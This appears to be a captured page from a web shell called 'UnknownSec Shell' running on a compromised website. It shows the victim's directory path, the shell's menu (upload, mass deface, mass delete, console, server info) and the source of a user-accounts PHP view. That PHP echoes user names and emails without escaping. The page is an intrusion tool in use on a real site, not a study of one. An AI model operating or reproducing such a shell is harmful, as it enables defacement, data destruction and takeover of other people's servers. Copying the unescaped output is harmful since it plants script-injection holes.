shell bypass 403
UnknownSec Shell
:
/
home
/
delvin
/
public_html
/
views
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
v_users.php
<div class='col-10'> <h1>User Accounts</h1> </div> <div class='col-2 right'> <form action='' method='post'> <input type='submit' name='submitBut' value='Add User' class='btn btn_add'> </form> </div> <style type="text/css"> .data_table { margin-top: 6px; border-spacing: 0px; width: 100%; padding: 0; } .data_table th { background-color: #3D368B; color: #fff; font-weight: bold; text-align:left; padding: 1px 8px 2px 8px; border-bottom: solid 1px #fff; } .data_table td { border-bottom: solid 1px #3D368B; padding: 3px; font-size: 12px; } .data_table .Total{ font-weight: bold; } </style> <table class='data_table'> <tr> <th>ID #</th><th>Name</th><th>Username</th><th>Email</th><th class='centre'>Action</th> </tr> <?php $Users = new Users; $rows = $Users->get('', '', ''); foreach ($rows as $userID => $row){ echo " <tr> <td>".$row['userID']."</td> <td>".$row['fName']." ".$row['lName']."</td> <td>".$row['username']."</td> <td>".$row['email']."</td> <td class='centre'><form action='' method='post'> <input type='hidden' name='userID' value='".$row['userID']."'> <input type='submit' name='submitBut' value='Edit' class='btn btn_edit btn-mini'> <input type='submit' name='submitBut' value='Delete' class='btn btn_delete btn-mini'> </form></td> </tr>"; } ?> </table>
© 2026 UnknownSec